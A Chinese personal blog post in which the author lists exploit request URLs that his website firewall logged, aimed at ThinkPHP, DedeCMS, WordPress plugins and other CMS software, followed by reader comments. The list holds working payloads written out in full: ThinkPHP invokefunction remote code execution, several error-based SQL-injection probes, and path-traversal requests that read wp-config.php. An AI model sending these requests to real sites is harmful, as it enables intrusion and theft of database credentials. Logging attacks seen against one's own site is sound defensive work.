• 好气啊~原来使用的CDN服务商莫名其妙的给我服务取消了~
  • 遇见一个沙雕汽车人.
  • 换了证书看看测试一下效果~
  • 煞笔!啥时候开工资?
  • 哪位小垃圾CC我呢?一位来自湖南的小垃圾!反正我流量无限的这样也没意义啊?
  • 测试一哈
  • 丫的Google抓取不到..换CF吧..
  • 告诉大家一个小秘密.域名后面加上 /siwa 发现不一样的世界…
  • 缓存测试2
  • 看看缓存好使不…

常见的程序漏洞渗透语句ThinkPHP/织梦(dede)/WordPress等…

PHP KIENG 4个月前 (03-11) 38826次浏览 已收录 3个吐槽 扫描二维码

:lol:

都是渗透我博客防火墙里看到的…

我只知道大概的渗透语句,和渗透什么程序的.具体好不好使怎么用我就不知道了…

#织梦
/digg/digg_add.php?id=1&con=2&digg_mod=digg_data%20WHERE%201=2%20+and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(1234),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23

#thinkphp 5
/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=1

#不太清楚
/index.php?item_id=1&list%5Bordering%5D=&list%5Bselect%5D=updatexml%280x23%2Cconcat%281%2Cmd5%288888%29%29%2C1%29&option=com_contenthistory&type_id=1&view=history

#不太清楚
/index.php?id=..%2F..%2FConf%2Fconfig.php&s=Admin-Data-down

#Etouch2.0
/upload/mobile/index.php?a=asynclist&c=category&price_max=1.0+AND+%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x7e%2Cmd5%281%29%2C0x7e%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29%27

#不清楚
/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1%29union%28select%283%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cstr%2841870%2A40962%29%2Cnull

#不清楚
/member/ajax_membergroup.php?action=post&membergroup=%40%60%27%60%2F%2A%2150000Union+%2A%2F+%2F%2A%2150000select+%2A%2F+md5%28997494206%29+--+%40%60%27%60

#thinkphp5
/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1

#thinkphp
/index.php?s=Home/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1

/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1

#基于 thinkphp 的某 cms
/index.php?a=company_focus&c=AjaxPersonal&company_id%5B0%5D=match&company_id%5B1%5D%5B0%5D=aaaaaaa%22%29+and+extractvalue%281%2Cconcat%280x7e%2Cmd5%2899999999%29%29%29+--+a&m=

#织梦
/plus/carbuyaction.php?code=..%2F..%2F&dopost=return

#WordPress
/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php

/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php

/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10

我暂时防火墙拦截到的就这么多…记录一下吧…这种大部分都是全自动扫描的,挺烦人的说实话.. :P


KIENG , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA 4.0协议进行授权
转载请注明出处:常见的程序漏洞渗透语句 ThinkPHP/织梦(dede)/WordPress 等…
本文章链接:https://blog.kieng.cn/2252.html
喜欢 (0)
KIENG
关于作者:
一个热衷网络的Man
发表我的评论
取消评论
表情 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 快速获取昵称
  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(3)个小伙伴在吐槽
  1. 从WP分析,插件不更新也很容易导致被注入渗透,所以还是用常更新稳定的插件好
    Sam.Z2020-03-12 13:13 回复 Windows 10 | Firefox浏览器 73.0
    • KIENG
      WordPress正常来说本身没啥太大问题,基本都是插件的bug.换个友链吗?
      KIENG2020-03-12 13:15 回复 Windows 10 | Chrome 70.0.3538.25
  2. 被TP坑过一次
    瀁瀟瀳瀣2020-03-16 08:39 回复 Windows 10 | Chrome 80.0.3987.100